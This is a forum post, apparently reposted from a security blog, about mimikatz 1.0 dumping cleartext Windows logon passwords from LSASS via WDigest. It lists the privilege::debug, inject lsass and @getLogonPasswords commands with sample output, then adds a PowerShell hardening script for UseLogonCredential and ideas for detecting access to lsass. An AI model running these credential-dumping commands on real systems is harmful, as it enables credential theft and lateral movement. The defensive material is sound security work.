Hey Frenzzz...
The researcher "Swiss knife" recently published on his blog a new version of the mimikatz utility, 1.0, designed to work with Windows credentials. In addition to functionality similar to Windows Credentials Editor, the new version implements retrieval of users' passwords in cleartext.
The weakness mimikatz uses lies in the implementation of WDigest.dll, which handles Digest authentication. Supporting SSO (Single Sign On) in the HTTP Digest Authentication mechanism requires knowledge of the password that was entered, not only its hash. Therefore, the Windows developers decided to keep the passwords in the clear.
To list the passwords of the users logged on to the system, run the following commands:
mimikatz # privilege::debug
mimikatz # inject::process lsass.exe sekurlsa.dll
mimikatz # @getLogonPasswords

The output will be approximately as follows:

Code:
mimikatz # privilege::debug
Demande d'ACTIVATION du privilege : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 680
Attente de connexion du client...
Serveur connecte a un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des donnees de securites dans LSASS

mimikatz # @getLogonPasswords

Authentification Id : 0 248 844
Package d'authentification : NTLM
Utilisateur principal : ANONYMOUS LOGON
Domaine d'authentification : NT AUTHORITY
        msv1_0 :  n.t. (LUID KO)
        wdigest : n.t. (LUID KO)
        tspkg :   n.t. (LUID KO)

Authentification Id : 0 996
Package d'authentification : Negotiate
Utilisateur principal : PC01$
Domaine d'authentification : WORKGROUP
        msv1_0 :  n.t. (LUID KO)
        wdigest :
        tspkg :   n.t. (LUID KO)

Authentification Id : 0 575 543
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : PC01
        msv1_0 :  lm{ 336dcb9831c8a03dka9872550c3cee6 }, ntlm{ 76af46e798f45ceb87805ba95380b39ed }
        wdigest : password
        tspkg :   password

Authentification Id : 0 997
Package d'authentification : Negotiate
Utilisateur principal : LOCAL SERVICE
Domaine d'authentification : NT AUTHORITY
        msv1_0 :  n.t. (LUID KO)
        wdigest :
        tspkg :   n.t. (LUID KO)

Authentification Id : 0 62 105
Package d'authentification : NTLM
Utilisateur principal :
Domaine d'authentification :
        msv1_0 :  n.t. (LUID KO)
        wdigest : n.t. (LUID KO)
        tspkg :   n.t. (LUID KO)

Authentification Id : 0 999
Package d'authentification : NTLM
Utilisateur principal : PC01$
Domaine d'authentification : WORKGROUP
        msv1_0 :  n.t. (LUID KO)
        wdigest :
        tspkg :   n.t. (LUID KO)

mimikatz #
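The wdigest field above is populated because WDigest keeps a reversible copy of the logon password inside LSASS for Digest SSO. As an added defender-side check that is not part of the original post: Microsoft later made this behaviour configurable through the UseLogonCredential value under the WDigest key (added to Windows 7 / 2008 R2 / 8 / 2012 by KB2871997, and off by default from Windows 8.1 / 2012 R2 onward). The script below audits that value and sets it to 0 where it is missing or enabled. The registry path and value name are Microsoft's documented ones; the function names are my own, and the script assumes it runs in an elevated PowerShell session.

```powershell
# Added example (not from the original post): audit and harden WDigest cleartext caching.
# UseLogonCredential: 0 = LSASS does not keep the cleartext logon secret for WDigest,
#                     1 = it does (the getLogonPasswords output above comes from this).
# On Windows 7 / 2008 R2 / 8 / 2012 the value is only honoured once KB2871997 is installed.

$WDigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

function Get-WDigestCleartextState {
    # Returns a short string describing the effective state on this host.
    $prop = Get-ItemProperty -Path $WDigestKey -Name UseLogonCredential -ErrorAction SilentlyContinue
    $os   = [Environment]::OSVersion.Version

    if ($null -eq $prop) {
        # Value absent: the OS default decides. 6.3 (8.1 / 2012 R2) and later default to off.
        if ($os.Major -gt 6 -or ($os.Major -eq 6 -and $os.Minor -ge 3)) {
            return 'Disabled (OS default, value not set)'
        }
        return 'Enabled (legacy default, value not set)'
    }

    if ([int]$prop.UseLogonCredential -eq 0) { return 'Disabled (explicit)' }
    return 'Enabled (explicit)'
}

function Disable-WDigestCleartext {
    # Creates the key if needed and pins UseLogonCredential to 0 as a REG_DWORD.
    if (-not (Test-Path $WDigestKey)) {
        New-Item -Path $WDigestKey -Force | Out-Null
    }
    New-ItemProperty -Path $WDigestKey -Name UseLogonCredential `
        -PropertyType DWord -Value 0 -Force | Out-Null
    # Sessions that are already logged on keep their cached secret until they log off;
    # the change only takes effect for logons that happen after this point.
}

$state = Get-WDigestCleartextState
Write-Host "WDigest cleartext caching: $state"

if ($state -like 'Enabled*') {
    Disable-WDigestCleartext
    Write-Host 'Set UseLogonCredential=0. Existing logon sessions keep their secret until log-off.'
    Write-Host "Now: $(Get-WDigestCleartextState)"
}
```

Run it once per host (or push the same value by Group Policy preference); re-run the audit part after the change and after the next logoff/logon cycle to confirm the wdigest field is no longer recoverable. Independently of this setting, the sequence shown above also leaves traces worth alerting on: enabling SeDebugPrivilege from an interactive session and a non-system process opening a handle to lsass.exe (Sysmon ProcessAccess, event ID 10, targeting lsass.exe) are both observable before any secret is read.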
The functionality of mimikatz is currently being implemented in the Metasploit Framework, and can be reproduced by many security researchers.
This article was originally published in the forum topic: Microsoft and the topic hole INC.